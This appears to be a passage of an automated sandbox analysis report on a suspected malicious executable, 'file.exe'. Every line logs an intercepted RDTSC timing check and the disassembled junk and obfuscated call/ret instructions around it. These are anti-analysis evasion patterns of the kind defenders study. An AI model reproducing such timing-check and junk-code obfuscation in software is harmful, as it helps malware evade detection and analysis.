Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E4A1 second address: 93E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E597 second address: 93E59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93E59D second address: 93E5A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93F552 second address: 93F561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940009 second address: 940013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940A59 second address: 940A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940A5D second address: 940AF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jnp 00007FFBC91A3BD6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FFBC91A3BE8h 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FFBC91A3BD8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov edi, ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FFBC91A3BD8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 push 00000000h 0x00000055 and edi, 2076C458h 0x0000005b xchg eax, ebx 0x0000005c jo 00007FFBC91A3BEFh 0x00000062 push eax 0x00000063 push edx 0x00000064 push edx 0x00000065 pop edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 941571 second address: 94157A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 942D25 second address: 942D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940830 second address: 940836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940836 second address: 94083B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94083B second address: 940845 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFBC8B2DA9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9448AA second address: 9448B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9448B3 second address: 9448BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FFBC8B2DA96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9448BD second address: 9448C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945F68 second address: 945FB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFBC8B2DA9Dh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FFBC8B2DA9Dh 0x00000013 jne 00007FFBC8B2DA96h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push edx 0x0000001d push edi 0x0000001e jmp 00007FFBC8B2DAA5h 0x00000023 pop edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jne 00007FFBC8B2DA96h 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94AB07 second address: 94AB11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 941F5B second address: 941F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94CB45 second address: 94CB4F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94DAE3 second address: 94DB6C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC8B2DAA3h 0x00000008 jmp 00007FFBC8B2DA9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FFBC8B2DA98h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov ebx, eax 0x0000002c push 00000000h 0x0000002e jnc 00007FFBC8B2DA9Ch 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007FFBC8B2DA98h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push esi 0x00000053 push edi 0x00000054 pop edi 0x00000055 pop esi 0x00000056 pushad 0x00000057 jmp 00007FFBC8B2DAA7h 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EBC7 second address: 94EBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EBCD second address: 94EBDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FFBC8B2DA96h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EBDF second address: 94EBE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9521E0 second address: 952273 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FFBC8B2DAA4h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FFBC8B2DA98h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+122D2C77h], ecx 0x0000002f pushad 0x00000030 xor ecx, dword ptr [ebp+122D1FA2h] 0x00000036 or dword ptr [ebp+122D2C60h], esi 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FFBC8B2DA98h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 add dword ptr [ebp+12456EC0h], ebx 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007FFBC8B2DAA1h 0x00000066 push ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948C2F second address: 948C49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BE5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9531FB second address: 953200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953200 second address: 953222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBC91A3BD6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 jmp 00007FFBC91A3BE0h 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9541A1 second address: 954239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FFBC8B2DAA2h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FFBC8B2DA98h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a pushad 0x0000002b xor cx, 4A37h 0x00000030 mov dword ptr [ebp+122D1F06h], esi 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007FFBC8B2DA98h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D2439h] 0x00000059 mov ebx, dword ptr [ebp+12450FEBh] 0x0000005f push 00000000h 0x00000061 jmp 00007FFBC8B2DAA2h 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FFBC8B2DA9Dh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94CCCF second address: 94CCEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBC91A3BE1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95622E second address: 95624C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94CCEA second address: 94CD05 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFBC91A3BDFh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95624C second address: 956261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94ED6A second address: 94EE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FFBC91A3BD8h 0x00000011 pop edx 0x00000012 nop 0x00000013 mov di, ax 0x00000016 call 00007FFBC91A3BDAh 0x0000001b sub ebx, dword ptr [ebp+122D3806h] 0x00000021 pop ebx 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov dword ptr [ebp+122D2962h], ecx 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 xor ebx, dword ptr [ebp+122D217Bh] 0x0000003c mov eax, dword ptr [ebp+122D0111h] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FFBC91A3BD8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000019h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c push FFFFFFFFh 0x0000005e push 00000000h 0x00000060 push ebx 0x00000061 call 00007FFBC91A3BD8h 0x00000066 pop ebx 0x00000067 mov dword ptr [esp+04h], ebx 0x0000006b add dword ptr [esp+04h], 00000018h 0x00000073 inc ebx 0x00000074 push ebx 0x00000075 ret 0x00000076 pop ebx 0x00000077 ret 0x00000078 nop 0x00000079 jp 00007FFBC91A3BE0h 0x0000007f pushad 0x00000080 push eax 0x00000081 push edx 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94EE06 second address: 94EE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95720B second address: 957210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B39B second address: 95B3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95B3A1 second address: 95B3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953398 second address: 953416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FFBC8B2DAA1h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1F06h], ecx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jo 00007FFBC8B2DA9Ch 0x0000001f add dword ptr [ebp+1244E131h], eax 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov eax, dword ptr [ebp+122D1505h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FFBC8B2DA98h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c jmp 00007FFBC8B2DAA1h 0x00000051 push FFFFFFFFh 0x00000053 mov edi, dword ptr [ebp+122D39F6h] 0x00000059 push eax 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953416 second address: 95341A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954313 second address: 954336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FFBC8B2DAA7h 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95648B second address: 95648F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95648F second address: 9564A1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9564A1 second address: 9564A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9564A5 second address: 9564AF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9584D9 second address: 9584DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95249C second address: 9524CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FFBC8B2DAADh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9524CD second address: 9524D7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFBC91A3BDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FEC58 second address: 8FECA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FFBC8B2DAA4h 0x0000000d jmp 00007FFBC8B2DAA2h 0x00000012 jmp 00007FFBC8B2DAA1h 0x00000017 ja 00007FFBC8B2DA96h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FECA2 second address: 8FECA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FECA6 second address: 8FECC0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC8B2DAA0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8FECC0 second address: 8FECC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 963296 second address: 96329A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96350D second address: 963517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FFBC91A3BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96863D second address: 968643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9691F7 second address: 969219 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FFBC91A3BD8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 969219 second address: 969233 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFBC8B2DA9Ch 0x00000008 jne 00007FFBC8B2DA96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 969233 second address: 969266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBC91A3BE9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 969266 second address: 791B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FFBC8B2DAA9h 0x0000000f push dword ptr [ebp+122D0595h] 0x00000015 cld 0x00000016 jbe 00007FFBC8B2DAA2h 0x0000001c jc 00007FFBC8B2DA9Ch 0x00000022 jbe 00007FFBC8B2DA96h 0x00000028 call dword ptr [ebp+122D1DD7h] 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D189Fh], edi 0x00000035 xor eax, eax 0x00000037 jmp 00007FFBC8B2DAA0h 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 mov dword ptr [ebp+122D189Fh], esi 0x00000046 mov dword ptr [ebp+122D39AAh], eax 0x0000004c jmp 00007FFBC8B2DA9Ch 0x00000051 jmp 00007FFBC8B2DAA7h 0x00000056 mov esi, 0000003Ch 0x0000005b jmp 00007FFBC8B2DAA9h 0x00000060 add esi, dword ptr [esp+24h] 0x00000064 jmp 00007FFBC8B2DAA6h 0x00000069 clc 0x0000006a lodsw 0x0000006c stc 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 clc 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D189Fh], edx 0x0000007c nop 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 pushad 0x00000081 popad 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96DCAD second address: 96DCB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E392 second address: 96E3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DAA0h 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E3AB second address: 96E3B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E3B1 second address: 96E3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E6B6 second address: 96E6C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFBC91A3BD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EAC7 second address: 96EADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EADD second address: 96EAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EC5E second address: 96EC64 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EC64 second address: 96EC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FFBC91A3BDCh 0x0000000c jp 00007FFBC91A3BD6h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007FFBC91A3BD6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96EDD0 second address: 96EE18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC8B2DAB9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC8B2DAA8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974852 second address: 97485A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97485A second address: 974871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DAA0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974871 second address: 974875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 974875 second address: 97487B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97487B second address: 974886 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9736AB second address: 9736B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
